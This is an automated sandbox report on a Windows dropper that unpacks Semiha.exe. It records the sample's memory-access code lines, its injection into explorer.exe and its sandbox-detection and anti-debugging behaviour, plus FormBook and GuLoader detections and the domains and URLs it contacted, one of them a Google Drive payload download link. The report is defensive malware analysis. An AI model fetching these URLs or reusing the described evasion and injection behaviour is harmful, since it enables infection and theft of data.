Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E898CD6 mov eax, dword ptr fs:[00000030h] 25_2_1E898CD6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8814FB mov eax, dword ptr fs:[00000030h] 25_2_1E8814FB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E89740D mov eax, dword ptr fs:[00000030h] 25_2_1E89740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E89740D mov eax, dword ptr fs:[00000030h] 25_2_1E89740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E89740D mov eax, dword ptr fs:[00000030h] 25_2_1E89740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881C06 mov eax, dword ptr fs:[00000030h] 25_2_1E881C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E847016 mov eax, dword ptr fs:[00000030h] 25_2_1E847016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E847016 mov eax, dword ptr fs:[00000030h] 25_2_1E847016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E847016 mov eax, dword ptr fs:[00000030h] 25_2_1E847016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E894015 mov eax, dword ptr fs:[00000030h] 25_2_1E894015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E894015 mov eax, dword ptr fs:[00000030h] 25_2_1E894015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FF0BF mov ecx, dword ptr fs:[00000030h] 25_2_1E7FF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FF0BF mov eax, dword ptr fs:[00000030h] 25_2_1E7FF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FF0BF mov eax, dword ptr fs:[00000030h] 25_2_1E7FF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85C450 mov eax, dword ptr fs:[00000030h] 25_2_1E85C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85C450 mov eax, dword ptr fs:[00000030h] 25_2_1E85C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E882073 mov eax, dword ptr fs:[00000030h] 25_2_1E882073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9080 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9080
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E891074 mov eax, dword ptr fs:[00000030h] 25_2_1E891074
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7EC577 mov eax, dword ptr fs:[00000030h] 25_2_1E7EC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7EC577 mov eax, dword ptr fs:[00000030h] 25_2_1E7EC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CB171 mov eax, dword ptr fs:[00000030h] 25_2_1E7CB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CB171 mov eax, dword ptr fs:[00000030h] 25_2_1E7CB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E7D50 mov eax, dword ptr fs:[00000030h] 25_2_1E7E7D50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7EB944 mov eax, dword ptr fs:[00000030h] 25_2_1E7EB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7EB944 mov eax, dword ptr fs:[00000030h] 25_2_1E7EB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F4D3B mov eax, dword ptr fs:[00000030h] 25_2_1E7F4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F4D3B mov eax, dword ptr fs:[00000030h] 25_2_1E7F4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F4D3B mov eax, dword ptr fs:[00000030h] 25_2_1E7F4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F513A mov eax, dword ptr fs:[00000030h] 25_2_1E7F513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F513A mov eax, dword ptr fs:[00000030h] 25_2_1E7F513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D3D34 mov eax, dword ptr fs:[00000030h] 25_2_1E7D3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CAD30 mov eax, dword ptr fs:[00000030h] 25_2_1E7CAD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 mov eax, dword ptr fs:[00000030h] 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 mov eax, dword ptr fs:[00000030h] 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 mov eax, dword ptr fs:[00000030h] 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 mov eax, dword ptr fs:[00000030h] 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 mov ecx, dword ptr fs:[00000030h] 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E878DF1 mov eax, dword ptr fs:[00000030h] 25_2_1E878DF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9100 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9100 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9100 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CB1E1 mov eax, dword ptr fs:[00000030h] 25_2_1E7CB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CB1E1 mov eax, dword ptr fs:[00000030h] 25_2_1E7CB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CB1E1 mov eax, dword ptr fs:[00000030h] 25_2_1E7CB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E898D34 mov eax, dword ptr fs:[00000030h] 25_2_1E898D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E803D43 mov eax, dword ptr fs:[00000030h] 25_2_1E803D43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E843540 mov eax, dword ptr fs:[00000030h] 25_2_1E843540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F35A1 mov eax, dword ptr fs:[00000030h] 25_2_1E7F35A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C2D8A mov eax, dword ptr fs:[00000030h] 25_2_1E7C2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C2D8A mov eax, dword ptr fs:[00000030h] 25_2_1E7C2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C2D8A mov eax, dword ptr fs:[00000030h] 25_2_1E7C2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C2D8A mov eax, dword ptr fs:[00000030h] 25_2_1E7C2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C2D8A mov eax, dword ptr fs:[00000030h] 25_2_1E7C2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FA185 mov eax, dword ptr fs:[00000030h] 25_2_1E7FA185
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7EC182 mov eax, dword ptr fs:[00000030h] 25_2_1E7EC182
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_0056C093 mov eax, dword ptr fs:[00000030h] 25_2_0056C093
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00569CA7 mov eax, dword ptr fs:[00000030h] 25_2_00569CA7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_0056BA69 mov eax, dword ptr fs:[00000030h] 25_2_0056BA69
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8096E0 NtFreeVirtualMemory,LdrInitializeThunk, 25_2_1E8096E0
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC7360 SetUnhandledExceptionFilter, 0_2_00FC7360
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC6C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00FC6C35

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC15FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary, 0_2_00FC15FC
Source: Semiha.exe, 00000019.00000002.779341239.0000000000DC0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.745039076.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.764873429.0000000001400000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: Semiha.exe, 00000019.00000002.779341239.0000000000DC0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.745039076.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.764873429.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.767671980.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Semiha.exe, 00000019.00000002.779341239.0000000000DC0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.745039076.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.764873429.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Semiha.exe, 00000019.00000002.779341239.0000000000DC0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.745039076.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.764873429.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001C.00000002.764378557.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.744799503.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000001C.00000002.771240055.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.752050950.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC75A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00FC75A8
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC2A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle, 0_2_00FC2A7E

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: Semiha.exe PID: 5580, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 542742 Sample: Original Doc Ref SN02853801... Startdate: 20/12/2021 Architecture: WINDOWS Score: 100 36 Multi AV Scanner detection for domain / URL 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 8 Original Doc Ref SN02853801324189923.exe 1 3 2->8         started        11 rundll32.exe 2->11         started        process3 file4 22 C:\Users\user\AppData\Local\...\Semiha.exe, PE32 8->22 dropped 13 Semiha.exe 8->13         started        process5 signatures6 44 Multi AV Scanner detection for dropped file 13->44 46 Machine Learning detection for dropped file 13->46 48 Tries to detect Any.run 13->48 50 2 other signatures 13->50 16 Semiha.exe 6 13->16         started        process7 dnsIp8 24 googlehosted.l.googleusercontent.com 172.217.168.1, 443, 49831 GOOGLEUS United States 16->24 26 drive.google.com 172.217.168.46, 443, 49830 GOOGLEUS United States 16->26 28 doc-10-80-docs.googleusercontent.com 16->28 30 Tries to detect Any.run 16->30 32 Maps a DLL or memory area into another process 16->32 34 Hides threads from debuggers 16->34 20 explorer.exe 16->20 injected signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.46
 drive.google.com United States
15169 GOOGLEUS false
172.217.168.1
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 172.217.168.46 true
googlehosted.l.googleusercontent.com 172.217.168.1 true
doc-10-80-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://doc-10-80-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8i4krmmckqtjah3e0j55ac599/1640006700000/05208698352720309252/*/1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl?e=download false
    		high
    www.thesocialmediacreator.com/i638/ true
    • 5%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 low